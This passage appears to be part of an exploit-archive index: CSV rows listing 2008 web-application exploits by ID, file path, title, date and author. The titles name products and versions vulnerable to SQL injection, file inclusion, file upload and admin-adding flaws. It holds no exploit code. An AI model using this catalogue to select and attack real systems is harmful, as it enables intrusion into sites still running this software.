Scripting",2008-05-14,e.wiZz!,webapps,php, +5621,exploits/php/webapps/5621.txt,"Kostenloses Linkmanagementscript - Remote File Inclusion",2008-05-14,HaCkeR_EgY,webapps,php, +5623,exploits/php/webapps/5623.txt,"Kostenloses Linkmanagementscript - SQL Injection",2008-05-15,"Virangar Security",webapps,php, +5624,exploits/php/webapps/5624.txt,"newsmanager 2.0 - Remote File Inclusion / File Disclosure / SQL Injection",2008-05-15,GoLd_M,webapps,php, +5626,exploits/php/webapps/5626.txt,"68 Classifieds 4.0 - 'category.php' SQL Injection",2008-05-15,HaCkeR_EgY,webapps,php, +5627,exploits/php/webapps/5627.pl,"Pet Grooming Management System 2.0 - Arbitrary Add Admin",2008-05-15,t0pP8uZz,webapps,php, +5628,exploits/php/webapps/5628.txt,"RantX 1.0 - Insecure Admin Authentication",2008-05-15,t0pP8uZz,webapps,php, +5629,exploits/php/webapps/5629.txt,"Web Slider 0.6 - Insecure Cookie/Authentication Handling",2008-05-15,t0pP8uZz,webapps,php, +5630,exploits/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 - Insecure Cookie Handling",2008-05-15,t0pP8uZz,webapps,php, +5631,exploits/php/webapps/5631.txt,"IMGallery 2.5 - Multiple SQL Injections",2008-05-15,cOndemned,webapps,php, +5633,exploits/asp/webapps/5633.pl,"StanWeb.CMS - SQL Injection",2008-05-16,JosS,webapps,asp, +5634,exploits/php/webapps/5634.html,"Zomplog 3.8.2 - 'newuser.php' Arbitrary Add Admin",2008-05-16,ArxWolf,webapps,php, +5635,exploits/php/webapps/5635.pl,"Archangel Weblog 0.90.02 - 'post_id' SQL Injection",2008-05-16,Stack,webapps,php, +5636,exploits/php/webapps/5636.txt,"Zomplog 3.8.2 - 'force_download.php' File Disclosure",2008-05-16,Stack,webapps,php, +5637,exploits/php/webapps/5637.txt,"WR-Meeting 1.0 - 'msnum' Local File Disclosure",2008-05-17,Cr@zy_King,webapps,php, +5638,exploits/php/webapps/5638.txt,"How2ASP.net WebBoard 4.1 - SQL Injection",2008-05-17,"CWH Underground",webapps,php, +5639,exploits/php/webapps/5639.pl,"FicHive 1.0 - 'category' Blind SQL Injection",2008-05-17,His0k4,webapps,php, +5640,exploits/php/webapps/5640.py,"Smeego 1.0 - 'Cookie lang' Local File Inclusion",2008-05-17,0in,webapps,php, +5641,exploits/php/webapps/5641.txt,"CMS WebManager-Pro - Multiple SQL Injections",2008-05-18,dun,webapps,php, +5642,exploits/php/webapps/5642.txt,"TAGWORX.CMS 3.00.02 - Multiple SQL Injections",2008-05-18,dun,webapps,php, +5643,exploits/php/webapps/5643.txt,"Ajax Framework - 'lang' Local File Inclusion",2008-05-18,dun,webapps,php, +5644,exploits/php/webapps/5644.txt,"Lulieblog 1.2 - Multiple Vulnerabilities",2008-05-18,Cod3rZ,webapps,php, +5645,exploits/php/webapps/5645.txt,"AlkalinePHP 0.77.35 - 'adduser.php' Arbitrary Add Admin",2008-05-18,t0pP8uZz,webapps,php, +5646,exploits/php/webapps/5646.txt,"Easycms 0.4.2 - Multiple Vulnerabilities",2008-05-18,t0pP8uZz,webapps,php, +5647,exploits/php/webapps/5647.txt,"GNU/Gallery 1.1.1.0 - 'admin.php' Local File Inclusion",2008-05-18,t0pP8uZz,webapps,php, +5648,exploits/php/webapps/5648.pl,"MeltingIce File System 1.0 - Arbitrary Add User",2008-05-18,t0pP8uZz,webapps,php, +5649,exploits/php/webapps/5649.pl,"PHP-AGTC Membership System 1.1a - Arbitrary Add Admin",2008-05-18,t0pP8uZz,webapps,php, +5650,exploits/php/webapps/5650.pl,"MyPicGallery 1.0 - Arbitrary Add Admin",2008-05-18,t0pP8uZz,webapps,php, +5651,exploits/php/webapps/5651.txt,"microssys CMS 1.5 - Remote File Inclusion",2008-05-19,Raz0r,webapps,php, +5652,exploits/php/webapps/5652.pl,"AlkalinePHP 0.80.00 Beta - 'thread.php' SQL Injection",2008-05-19,Stack,webapps,php, +5653,exploits/php/webapps/5653.php,"MercuryBoard 1.1.5 - 'login.php' Blind SQL Injection",2008-05-19,EgiX,webapps,php, +5654,exploits/php/webapps/5654.txt,"EntertainmentScript 1.4.0 - 'play.php' SQL Injection",2008-05-19,Mr.SQL,webapps,php, +5655,exploits/php/webapps/5655.pl,"EntertainmentScript 1.4.0 - 'page.php' Local File Inclusion",2008-05-20,Stack,webapps,php, +5656,exploits/php/webapps/5656.txt,"eCMS 0.4.2 - SQL Injection / Security Bypass",2008-05-20,"Virangar Security",webapps,php, +5657,exploits/php/webapps/5657.txt,"Mantis Bug Tracker 1.1.1 - Code Execution / Cross-Site Scripting / Cross-Site Request Forgery",2008-05-20,USH,webapps,php, +5658,exploits/php/webapps/5658.txt,"ComicShout 2.5 - 'comic_id' SQL Injection",2008-05-20,Niiub,webapps,php, +5659,exploits/php/webapps/5659.txt,"MX-System 2.7.3 - 'index.php' SQL Injection",2008-05-20,cOndemned,webapps,php, +5660,exploits/php/webapps/5660.txt,"PHP Jokesite 2.0 - 'cat_id' SQL Injection",2008-05-20,InjEctOr5,webapps,php, +5661,exploits/php/webapps/5661.txt,"Netious CMS 0.4 - 'pageid' SQL Injection",2008-05-21,InjEctOr5,webapps,php, +5662,exploits/cgi/webapps/5662.txt,"Alcatel OmniPCX Office 210/061.1 - Remote Command Execution",2008-05-21,DSecRG,webapps,cgi, +5663,exploits/php/webapps/5663.txt,"6rbScript - 'news.php' SQL Injection",2008-05-21,"Hussin X",webapps,php, +5664,exploits/php/webapps/5664.txt,"Weblosninger 4 - Cross-Site Scripting / SQL Injection",2008-05-21,Mr.SQL,webapps,php, +5665,exploits/php/webapps/5665.txt,"Netbutikker 4 - SQL Injection",2008-05-21,Mr.SQL,webapps,php, +5666,exploits/php/webapps/5666.txt,"e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection",2008-05-22,"Virangar Security",webapps,php, +5668,exploits/php/webapps/5668.txt,"Quate CMS 0.3.4 - Multiple Vulnerabilities",2008-05-23,DSecRG,webapps,php, +5669,exploits/php/webapps/5669.txt,"OneCMS 2.5 - 'install_mod.php' Local File Inclusion",2008-05-23,DSecRG,webapps,php, +5670,exploits/php/webapps/5670.txt,"RoomPHPlanning 1.5 - 'idresa' SQL Injection",2008-05-24,His0k4,webapps,php, +5671,exploits/php/webapps/5671.txt,"PHPRaider 1.0.7 - 'PHPbb3.functions.php' Remote File Inclusion",2008-05-24,Kacak,webapps,php, +5672,exploits/php/webapps/5672.txt,"plusphp url shortening software 1.6 - Remote File Inclusion",2008-05-25,DR.TOXIC,webapps,php, +5673,exploits/php/webapps/5673.txt,"Xomol CMS 1.2 - Authentication Bypass / Local File Inclusion",2008-05-25,DNX,webapps,php, +5674,exploits/php/webapps/5674.txt,"RoomPHPlanning 1.5 - Arbitrary Add Admin",2008-05-26,Stack,webapps,php, +5675,exploits/php/webapps/5675.txt,"RoomPHPlanning 1.5 - Multiple SQL Injections",2008-05-26,"Virangar Security",webapps,php, +5676,exploits/php/webapps/5676.txt,"CMS MAXSITE 1.10 - 'category' SQL Injection",2008-05-26,Tesz,webapps,php, +5677,exploits/php/webapps/5677.txt,"RevokeBB 1.0 RC11 - 'Search' SQL Injection",2008-05-27,The:Paradox,webapps,php, +5678,exploits/php/webapps/5678.txt,"CKGold Shopping Cart 2.5 - 'category_id' SQL Injection",2008-05-27,Cr@zy_King,webapps,php, +5680,exploits/php/webapps/5680.txt,"OtomiGen.x 2.2 - 'lang' Local File Inclusion",2008-05-27,Saime,webapps,php, +5683,exploits/php/webapps/5683.txt,"PHPhotoalbum 0.5 - Multiple SQL Injections",2008-05-28,cOndemned,webapps,php, +5684,exploits/php/webapps/5684.txt,"Joomla! Component Artist - 'idgalery' SQL Injection",2008-05-28,Cr@zy_King,webapps,php, +5685,exploits/php/webapps/5685.txt,"FlashBlog - 'articulo_id' SQL Injection",2008-05-28,HER0,webapps,php, +5688,exploits/php/webapps/5688.php,"SyntaxCMS 1.3 - 'FCKeditor' Arbitrary File Upload",2008-05-29,Stack,webapps,php, +5689,exploits/php/webapps/5689.txt,"AirvaeCommerce 3.0 - 'pid' SQL Injection",2008-05-29,QTRinux,webapps,php, +5690,exploits/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 (Windows) - Local File Inclusion",2008-05-29,gmda,webapps,php, +5691,exploits/php/webapps/5691.php,"CMS from Scratch 1.1.3 - 'FCKeditor' Arbitrary File Upload",2008-05-29,EgiX,webapps,php, +5692,exploits/php/webapps/5692.pl,"Mambo Component mambads 1.0 RC1 Beta - SQL Injection",2008-05-29,Houssamix,webapps,php, +5693,exploits/php/webapps/5693.txt,"CMS from Scratch 1.1.3 - 'image.php' Directory Traversal",2008-05-29,Stack,webapps,php, +5696,exploits/php/webapps/5696.pl,"phpBookingCalendar 10 d - SQL Injection",2008-05-29,Stack,webapps,php, +5697,exploits/php/webapps/5697.php,"PHP Booking Calendar 10 d - 'FCKeditor' Arbitrary File Upload",2008-05-29,Stack,webapps,php, +5698,exploits/php/webapps/5698.txt,"HiveMaker Professional 1.0.2 - 'cid' SQL Injection",2008-05-30,K-159,webapps,php, +5699,exploits/php/webapps/5699.txt,"PsychoStats 2.3.3 - Multiple SQL Injections",2008-05-31,Mr.SQL,webapps,php, +5700,exploits/php/webapps/5700.html,"CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload",2008-05-31,irk4z,webapps,php, +5701,exploits/php/webapps/5701.txt,"Social Site Generator 2.0 - 'sgc_id' SQL Injection",2008-05-31,"DeAr Ev!L",webapps,php, +5702,exploits/php/webapps/5702.txt,"Azuresites CMS - Multiple Vulnerabilities",2008-05-31,Lidloses_Auge,webapps,php, +5703,exploits/php/webapps/5703.txt,"PHP Visit Counter 0.4 - 'datespan' SQL Injection",2008-05-31,Lidloses_Auge,webapps,php, +5704,exploits/php/webapps/5704.txt,"PassWiki 0.9.16 RC3 - 'site_id' Local File Inclusion",2008-05-31,mozi,webapps,php, +5705,exploits/asp/webapps/5705.txt,"BP Blog 6.0 - 'id' Blind SQL Injection",2008-05-31,JosS,webapps,asp, +5706,exploits/php/webapps/5706.php,"EasyWay CMS - 'mid' SQL Injection",2008-05-31,Lidloses_Auge,webapps,php, +5707,exploits/php/webapps/5707.txt,"Social Site Generator 2.0 - 'path' Remote File Inclusion",2008-05-31,vBmad,webapps,php, +5708,exploits/php/webapps/5708.txt,"Joomla! Component prayercenter 1.4.9 - 'id' SQL Injection",2008-05-31,His0k4,webapps,php, +5710,exploits/php/webapps/5710.pl,"Joomla! Component Bible Study 1.5.0 - 'id' SQL Injection",2008-05-31,Stack,webapps,php, +5711,exploits/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,webapps,php, +5713,exploits/php/webapps/5713.txt,"ComicShout 2.8 - 'news_id' SQL Injection",2008-06-01,JosS,webapps,php, +5714,exploits/php/webapps/5714.pl,"Joomla! Component MyContent 1.1.13 - Blind SQL Injection",2008-06-01,His0k4,webapps,php, +5715,exploits/php/webapps/5715.txt,"DesktopOnNet 3 Beta - Multiple Remote File Inclusions",2008-06-01,MK,webapps,php, +5716,exploits/php/webapps/5716.txt,"mebiblio 0.4.7 - SQL Injection / Arbitrary File Upload / Cross-Site Scripting",2008-06-01,"CWH Underground",webapps,php, +5717,exploits/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store 1.3 Beta - SQL Injection",2008-06-01,KnocKout,webapps,asp, +5719,exploits/php/webapps/5719.pl,"Joomla! Component JooBB 0.5.9 - Blind SQL Injection",2008-06-01,His0k4,webapps,php, +5721,exploits/php/webapps/5721.pl,"Joomla! Component acctexp 0.12.x - Blind SQL Injection",2008-06-02,His0k4,webapps,php, +5722,exploits/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusions",2008-06-02,HaiHui,webapps,php, +5723,exploits/php/webapps/5723.txt,"Joomla! Component equotes 0.9.4 - SQL Injection",2008-06-02,His0k4,webapps,php, +5724,exploits/php/webapps/5724.txt,"PLog 1.0.6 - 'albumID' SQL Injection",2008-06-02,DreamTurk,webapps,php, +5725,exploits/php/webapps/5725.txt,"smeweb 1.4b - SQL Injection / Cross-Site Scripting",2008-06-02,"CWH Underground",webapps,php, +5728,exploits/php/webapps/5728.txt,"FlashBlog 0.31b - Arbitrary File Upload",2008-06-03,"ilker Kandemir",webapps,php, +5729,exploits/php/webapps/5729.txt,"Joomla! Component JoomRadio 1.0 - 'id' SQL Injection",2008-06-03,His0k4,webapps,php, +5730,exploits/php/webapps/5730.txt,"Joomla! Component iDoBlog b24 - SQL Injection",2008-06-03,His0k4,webapps,php, +5731,exploits/php/webapps/5731.txt,"Battle Blog 1.25 - 'comment.asp' SQL Injection",2008-06-03,Bl@ckbe@rD,webapps,php, +5733,exploits/php/webapps/5733.txt,"QuickerSite 1.8.5 - Multiple Vulnerabilities",2008-06-03,BugReport.IR,webapps,php, +5734,exploits/php/webapps/5734.pl,"Joomla! Component JooBlog 0.1.1 - Blind SQL Injection",2008-06-03,His0k4,webapps,php, +5736,exploits/php/webapps/5736.txt,"1Book Guestbook Script 1.0.1 - Code Execution",2008-06-03,JIKO,webapps,php, +5737,exploits/php/webapps/5737.pl,"Joomla! Component Jotloader 1.2.1.a - Blind SQL Injection",2008-06-04,His0k4,webapps,php, +5739,exploits/php/webapps/5739.txt,"PHP-Address Book 3.1.5 - SQL Injection / Cross-Site Scripting",2008-06-04,"CWH Underground",webapps,php, +5740,exploits/php/webapps/5740.pl,"Joomla! Component EasyBook 1.1 - 'gbid' SQL Injection",2008-06-04,ZAMUT,webapps,php, +5742,exploits/php/webapps/5742.txt,"427bb 2.3.1 - SQL Injection / Cross-Site Scripting",2008-06-05,"CWH Underground",webapps,php, +5743,exploits/php/webapps/5743.txt,"Joomla! Component SimpleShop 3.4 - SQL Injection",2008-06-05,His0k4,webapps,php, +5744,exploits/php/webapps/5744.txt,"Power Phlogger 2.2.5 - 'css_str' SQL Injection",2008-06-05,MustLive,webapps,php, +5745,exploits/php/webapps/5745.txt,"pSys 0.7.0.a - 'shownews' SQL Injection",2008-06-05,anonymous,webapps,php, +5748,exploits/php/webapps/5748.txt,"Joomla! Component JoomlaDate 1.2 - 'user' SQL Injection",2008-06-05,His0k4,webapps,php, +5752,exploits/php/webapps/5752.pl,"Joomla! Component GameQ 4.0 - SQL Injection",2008-06-07,His0k4,webapps,php, +5753,exploits/asp/webapps/5753.txt,"JiRo's FAQ Manager eXperience 1.0 - 'fID' SQL Injection",2008-06-08,Zigma,webapps,asp, +5754,exploits/php/webapps/5754.txt,"phpinv 0.8.0 - Local File Inclusion / Cross-Site Scripting",2008-06-08,"CWH Underground",webapps,php, +5755,exploits/php/webapps/5755.pl,"Joomla! Component yvComment 1.16 - Blind SQL Injection",2008-06-08,His0k4,webapps,php, +5756,exploits/php/webapps/5756.txt,"XOOPS Module Uploader 1.1 - 'Filename' File Disclosure",2008-06-08,MEEKAAH,webapps,php, +5757,exploits/php/webapps/5757.txt,"BrowserCRM 5.002.00 - 'clients.php' Remote File Inclusion",2008-06-08,ahmadbady,webapps,php, +5758,exploits/php/webapps/5758.txt,"Galatolo Web Manager 1.0 - Cross-Site Scripting / Local File Inclusion",2008-06-08,StAkeR,webapps,php, +5759,exploits/php/webapps/5759.txt,"Joomla! Component Rapid Recipe 1.6.6/1.6.7 - SQL Injection",2008-06-08,His0k4,webapps,php, +5760,exploits/php/webapps/5760.pl,"Galatolo Web Manager 1.0 - SQL Injection",2008-06-09,Stack,webapps,php, +5761,exploits/php/webapps/5761.pl,"Joomla! Component iJoomla News Portal 1.0 - 'itemID' SQL Injection",2008-06-09,"ilker Kandemir",webapps,php, +5762,exploits/php/webapps/5762.txt,"ProManager 0.73 - 'config.php' Local File Inclusion",2008-06-09,Stack,webapps,php, +5763,exploits/asp/webapps/5763.txt,"real estate Web site 1.0 - SQL Injection / Cross-Site Scripting",2008-06-09,JosS,webapps,asp, +5764,exploits/php/webapps/5764.txt,"Telephone Directory 2008 - SQL Injection / Cross-Site Scripting",2008-06-09,"CWH Underground",webapps,php, +5765,exploits/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 - 'article' SQL Injection",2008-06-09,Bl@ckbe@rD,webapps,asp, +5766,exploits/php/webapps/5766.txt,"realm CMS 2.3 - Multiple Vulnerabilities",2008-06-09,BugReport.IR,webapps,php, +5767,exploits/php/webapps/5767.php,"Flux CMS 1.5.0 - 'loadsave.php' Arbitrary File Overwrite",2008-06-09,EgiX,webapps,php, +5768,exploits/php/webapps/5768.txt,"pNews 2.08 - 'shownews' SQL Injection",2008-06-09,Cr@zy_King,webapps,php, +5769,exploits/php/webapps/5769.pl,"Telephone Directory 2008 - Arbitrary Delete Contact",2008-06-09,Stack,webapps,php, +5770,exploits/php/webapps/5770.php,"Achievo 1.3.2 - 'FCKeditor' Arbitrary File Upload",2008-06-09,EgiX,webapps,php, +5771,exploits/php/webapps/5771.txt,"ErfurtWiki R1.02b - Local File Inclusion",2008-06-10,Unohope,webapps,php, +5772,exploits/php/webapps/5772.txt,"DCFM Blog 0.9.4 - SQL Injection",2008-06-10,Unohope,webapps,php, +5773,exploits/php/webapps/5773.txt,"Yblog 0.2.2.2 - Cross-Site Scripting / SQL Injection",2008-06-10,Unohope,webapps,php, +5774,exploits/php/webapps/5774.txt,"Insanely Simple Blog 0.5 - SQL Injection",2008-06-10,Unohope,webapps,php, +5775,exploits/asp/webapps/5775.txt,"ASPPortal Free Version - 'Topic_Id' SQL Injection",2008-06-10,JosS,webapps,asp, +5776,exploits/php/webapps/5776.txt,"Experts 1.0.0 - 'answer.php' SQL Injection",2008-06-10,"CWH Underground",webapps,php, +5779,exploits/php/webapps/5779.txt,"SyndeoCMS 2.6.0 - Local File Inclusion / Cross-Site Scripting",2008-06-10,"CWH Underground",webapps,php, +5780,exploits/asp/webapps/5780.txt,"ASP Download 1.03 - Arbitrary Change Administrator Account",2008-06-10,Zigma,webapps,asp, +5781,exploits/asp/webapps/5781.txt,"Todd Woolums ASP News Management 2.2 - SQL Injection",2008-06-10,Bl@ckbe@rD,webapps,asp, +5782,exploits/php/webapps/5782.txt,"TNT Forum 0.9.4 - Local File Inclusion",2008-06-10,"CWH Underground",webapps,php, +5783,exploits/php/webapps/5783.txt,"Yuhhu 2008 SuperStar - 'board' SQL Injection",2008-06-10,RMx,webapps,php, +5784,exploits/php/webapps/5784.txt,"FOG Forum 0.8.1 - Multiple Local File Inclusions",2008-06-11,"CWH Underground",webapps,php, +5785,exploits/php/webapps/5785.txt,"eFiction 3.0 - 'toplists.php' SQL Injection",2008-06-11,Mr.SQL,webapps,php, +5786,exploits/php/webapps/5786.txt,"IPTBB 0.5.6 - Arbitrary Add Admin",2008-06-11,"CWH Underground",webapps,php, +5787,exploits/php/webapps/5787.txt,"MycroCMS 0.5 - Blind SQL Injection",2008-06-11,"CWH Underground",webapps,php, +5788,exploits/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injections",2008-06-11,BugReport.IR,webapps,php, +5789,exploits/php/webapps/5789.pl,"JAMM CMS - 'id' Blind SQL Injection",2008-06-11,anonymous,webapps,php, +5791,exploits/php/webapps/5791.txt,"Gravity Board X 2.0 Beta - SQL Injection / Cross-Site Scripting",2008-06-12,"CWH Underground",webapps,php, +5792,exploits/php/webapps/5792.txt,"Facil-CMS 0.1RC - Multiple Local File Inclusions",2008-06-12,"CWH Underground",webapps,php, +5794,exploits/php/webapps/5794.pl,"Clever Copy 3.0 - 'results.php' SQL Injection",2008-06-12,anonymous,webapps,php, +5796,exploits/php/webapps/5796.php,"GLLCTS2 < 4.2.4 - 'detail' SQL Injection",2008-06-12,TheDefaced,webapps,php, +5797,exploits/php/webapps/5797.txt,"Butterfly ORGanizer 2.0.0 - SQL Injection / Cross-Site Scripting",2008-06-13,"CWH Underground",webapps,php, +5798,exploits/php/webapps/5798.pl,"WebChamado 1.1 - Arbitrary Add Admin",2008-06-13,"CWH Underground",webapps,php, +5799,exploits/php/webapps/5799.pl,"Mambo Component Galleries 1.0 - 'aid' SQL Injection",2008-06-13,Houssamix,webapps,php, +5800,exploits/php/webapps/5800.pl,"Butterfly ORGanizer 2.0.0 - Arbitrary Delete (Category/Account)",2008-06-13,Stack,webapps,php, +5801,exploits/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 - 'section' Local File Inclusion",2008-06-13,Loader007,webapps,php, +5802,exploits/php/webapps/5802.txt,"WebChamado 1.1 - 'tsk_id' SQL Injection",2008-06-13,"Virangar Security",webapps,php, +5803,exploits/php/webapps/5803.txt,"Pre News Manager 1.0 - 'id' SQL Injection",2008-06-13,K-159,webapps,php, +5804,exploits/php/webapps/5804.txt,"Pre ADS Portal 2.0 - SQL Injection",2008-06-13,K-159,webapps,php, +5805,exploits/asp/webapps/5805.txt,"E-Smart Cart - 'productsofcat.asp' SQL Injection",2008-06-13,JosS,webapps,asp, +5806,exploits/php/webapps/5806.pl,"GLLCTS2 - 'sort' Blind SQL Injection",2008-06-13,anonymous,webapps,php, +5807,exploits/php/webapps/5807.txt,"PHP JOBWEBSITE PRO - 'JobSearch3.php' SQL Injection",2008-06-13,JosS,webapps,php, +5808,exploits/php/webapps/5808.txt,"Mambo 4.6.4 - 'Output.php' Remote File Inclusion",2008-06-13,irk4z,webapps,php, +5809,exploits/php/webapps/5809.txt,"Pre Job Board - 'JobSearch.php' SQL Injection",2008-06-14,JosS,webapps,php, +5810,exploits/php/webapps/5810.txt,"Contenido 4.8.4 - Remote File Inclusion / Cross-Site Scripting",2008-06-14,RoMaNcYxHaCkEr,webapps,php, +5811,exploits/php/webapps/5811.txt,"Family Connections CMS 1.4 - Multiple SQL Injections",2008-06-14,"CWH Underground",webapps,php, +5812,exploits/php/webapps/5812.txt,"PHPMyCart 1.3 - 'cat' SQL Injection",2008-06-14,anonymous,webapps,php, +5813,exploits/php/webapps/5813.txt,"SHOUTcast Admin Panel 2.0 - 'page' Local File Inclusion",2008-06-14,"CWH Underground",webapps,php, +5815,exploits/php/webapps/5815.pl,"Cartweaver 3 - 'prodId' Blind SQL Injection",2008-06-14,anonymous,webapps,php, +5816,exploits/php/webapps/5816.pl,"DIY - 'did' Blind SQL Injection",2008-06-14,Mr.SQL,webapps,php, +5818,exploits/php/webapps/5818.txt,"xeCMS 1.0.0 RC2 - Insecure Cookie Handling",2008-06-14,t0pP8uZz,webapps,php, +5819,exploits/php/webapps/5819.txt,"ezcms 1.2 - Blind SQL Injection / Authentication Bypass",2008-06-14,t0pP8uZz,webapps,php, +5820,exploits/php/webapps/5820.txt,"PHPEasyNews 1.13 RC2 - 'POST' SQL Injection",2008-06-14,t0pP8uZz,webapps,php, +5821,exploits/php/webapps/5821.txt,"Alstrasoft AskMe Pro 2.1 - Multiple SQL Injections",2008-06-14,t0pP8uZz,webapps,php, +5822,exploits/php/webapps/5822.txt,"Devalcms 1.4a - 'currentfile' Local File Inclusion",2008-06-15,"CWH Underground",webapps,php, +5823,exploits/php/webapps/5823.txt,"Advanced Webhost Billing System (AWBS) 2.7.1 - 'news.php' SQL Injection",2008-06-15,Mr.SQL,webapps,php, +5824,exploits/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",webapps,php, +5826,exploits/php/webapps/5826.py,"Simple Machines Forum (SMF) 1.1.4 - SQL Injection",2008-06-15,The:Paradox,webapps,php, +5828,exploits/php/webapps/5828.txt,"Oxygen 2.0 - 'repquote' SQL Injection",2008-06-15,anonymous,webapps,php, +5829,exploits/php/webapps/5829.txt,"SH-News 3.0 - Insecure Cookie Handling",2008-06-15,"Virangar Security",webapps,php, +5830,exploits/php/webapps/5830.txt,"Nitro Web Gallery 1.4.3 - 'section' SQL Injection",2008-06-16,Mr.SQL,webapps,php, +5831,exploits/php/webapps/5831.txt,"Open Azimyt CMS 0.22 - 'lang' Local File Inclusion",2008-06-16,DSecRG,webapps,php, +5832,exploits/php/webapps/5832.pl,"MyMarket 1.72 - Blind SQL Injection",2008-06-16,anonymous,webapps,php, +5833,exploits/php/webapps/5833.txt,"Joomla! Component Simple Shop Galore 3.x - 'catid' SQL Injection",2008-06-16,eXeCuTeR,webapps,php, +5834,exploits/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection",2008-06-17,Mr.SQL,webapps,php, +5835,exploits/php/webapps/5835.txt,"Bizon-CMS 2.0 - 'Id' SQL Injection",2008-06-17,Mr.SQL,webapps,php, +5836,exploits/php/webapps/5836.txt,"Basic-CMS - SQL Injection",2008-06-17,Mr.SQL,webapps,php, +5838,exploits/php/webapps/5838.txt,"FreeCMS.us 0.2 - 'index.php' SQL Injection",2008-06-17,Mr.SQL,webapps,php, +5839,exploits/php/webapps/5839.txt,"ClipShare < 3.0.1 - 'tid' SQL Injection",2008-06-17,SuNHouSe2,webapps,php, +5840,exploits/php/webapps/5840.txt,"easyTrade 2.x - 'id' SQL Injection",2008-06-17,anonymous,webapps,php, +5841,exploits/php/webapps/5841.txt,"ThaiQuickCart 3 - 'sLanguage' Cookie Local File Inclusion",2008-06-17,"CWH Underground",webapps,php, +5842,exploits/php/webapps/5842.txt,"PHP Site Lock 2.0 - 'index.php' SQL Injection",2008-06-17,Mr.SQL,webapps,php, +5844,exploits/php/webapps/5844.php,"FreeCMS.us 0.2 - 'FCKeditor' Arbitrary File Upload",2008-06-17,Stack,webapps,php, +5845,exploits/php/webapps/5845.txt,"MyShoutPro 1.2 - Final Insecure Cookie Handling",2008-06-17,Stack,webapps,php, +5846,exploits/php/webapps/5846.txt,"eroCMS 1.4 - 'site' SQL Injection",2008-06-17,Mr.SQL,webapps,php, +5847,exploits/php/webapps/5847.txt,"WebCalendar 1.0.4 - 'includedir' Remote File Inclusion",2008-06-17,Cr@zy_King,webapps,php, +5848,exploits/php/webapps/5848.txt,"traindepot 0.1 - Local File Inclusion / Cross-Site Scripting",2008-06-18,"CWH Underground",webapps,php, +5849,exploits/asp/webapps/5849.txt,"doITlive CMS 2.50 - SQL Injection / Cross-Site Scripting",2008-06-18,BugReport.IR,webapps,asp, +5850,exploits/asp/webapps/5850.txt,"AspWebCalendar 2008 - Arbitrary File Upload",2008-06-18,Alemin_Krali,webapps,asp, +5852,exploits/php/webapps/5852.txt,"netBIOS - 'newsid' SQL Injection",2008-06-18,"security fears team",webapps,php, +5853,exploits/php/webapps/5853.txt,"Maxtrade AIO 1.3.23 - 'categori' SQL Injection",2008-06-18,HaCkeR_EgY,webapps,php, +5854,exploits/php/webapps/5854.txt,"Mybizz-Classifieds - 'cat' SQL Injection",2008-06-18,HaCkeR_EgY,webapps,php, +5855,exploits/php/webapps/5855.txt,"Easy Webstore 1.2 - SQL Injection",2008-06-18,Mr.SQL,webapps,php, +5856,exploits/php/webapps/5856.txt,"nweb2fax 0.2.7 - Multiple Vulnerabilities",2008-06-18,dun,webapps,php, +5857,exploits/php/webapps/5857.txt,"Carscripts Classifieds - 'cat' SQL Injection",2008-06-18,Stack,webapps,php, +5858,exploits/php/webapps/5858.txt,"BoatScripts Classifieds - 'type' SQL Injection",2008-06-18,Stack,webapps,php, +5859,exploits/php/webapps/5859.txt,"eLineStudio Site Composer (ESC) 2.6 - Multiple Vulnerabilities",2008-06-19,BugReport.IR,webapps,php, +5860,exploits/php/webapps/5860.txt,"OwnRS blog beta3 - SQL Injection / Cross-Site Scripting",2008-06-19,"CWH Underground",webapps,php, +5861,exploits/php/webapps/5861.txt,"Yektaweb Academic Web Tools CMS 1.4.2.8 - Multiple Vulnerabilities",2008-06-19,BugReport.IR,webapps,php, +5862,exploits/php/webapps/5862.txt,"samart-cms 2.0 - 'contentsid' SQL Injection",2008-06-19,dun,webapps,php, +5863,exploits/php/webapps/5863.txt,"CMS-BRD - 'menuclick' SQL Injection",2008-06-19,dun,webapps,php, +5864,exploits/php/webapps/5864.txt,"Orlando CMS 0.6 - Remote File Inclusion",2008-06-19,Ciph3r,webapps,php, +5865,exploits/php/webapps/5865.txt,"CaupoShop Classic 1.3 - 'saArticle[ID]' SQL Injection",2008-06-19,anonymous,webapps,php, +5866,exploits/php/webapps/5866.txt,"Lotus Core CMS 1.0.1 - Remote File Inclusion",2008-06-19,Ciph3r,webapps,php, +5867,exploits/php/webapps/5867.txt,"AJ Auction Web 2.0 - 'cate_id' SQL Injection",2008-06-19,"Hussin X",webapps,php, +5868,exploits/php/webapps/5868.txt,"AJ Auction 1.0 - 'id' SQL Injection",2008-06-19,"Hussin X",webapps,php, +5869,exploits/asp/webapps/5869.txt,"Virtual Support Office XP 3.0.29 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,webapps,asp, +5870,exploits/php/webapps/5870.txt,"GL-SH Deaf Forum 6.5.5 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,webapps,php, +5871,exploits/php/webapps/5871.txt,"FireAnt 1.3 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,webapps,php, +5872,exploits/php/webapps/5872.txt,"FubarForum 1.5 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,webapps,php, +5873,exploits/php/webapps/5873.txt,"Lightweight news portal (LNP) 1.0b - Multiple Vulnerabilities",2008-06-20,storm,webapps,php, +5874,exploits/php/webapps/5874.txt,"IPTBB 0.5.6 - 'act' Local File Inclusion",2008-06-20,storm,webapps,php, +5875,exploits/php/webapps/5875.txt,"CiBlog 3.1 - 'id' SQL Injection",2008-06-20,Mr.SQL,webapps,php, +5876,exploits/php/webapps/5876.txt,"Jamroom 3.3.5 - Remote File Inclusion",2008-06-20,cyberlog,webapps,php, +5877,exploits/php/webapps/5877.txt,"jaxultrabb 2.0 - Local File Inclusion / Cross-Site 